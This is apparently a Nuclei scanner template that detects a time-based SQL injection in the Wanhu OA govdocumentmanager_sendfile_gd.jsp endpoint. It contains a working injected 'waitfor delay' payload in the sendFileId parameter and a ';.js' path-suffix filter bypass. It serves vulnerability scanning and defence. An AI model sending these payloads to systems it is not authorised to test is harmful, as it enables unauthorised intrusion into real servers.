id: wanhuOA-govdocumentmanager_sendfile_gd-sqli

info:
  name: 万户OA govdocumentmanager_sendfile_gd.jsp 存在SQL注入漏洞
  author: wanhuOA
  severity: high
  tags: wanhuOA

http:
  - raw:
      - |+
        GET /defaultroot/modules/govoffice/gov_documentmanager/govdocumentmanager_sendfile_gd.jsp;.js?sendFileId=1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close

      - |+
        GET /defaultroot/modules/govoffice/gov_documentmanager/govdocumentmanager_sendfile_gd.jsp;.js?sendFileId=1%3Bwaitfor%20delay%270%3A0%3A4%27 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close


    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration_2 >= 4'
          - 'duration_1 < 2'
          - 'duration_2 < 6'
        condition: and
      - type: word
        part: body
        words:
          - "defaultroot"

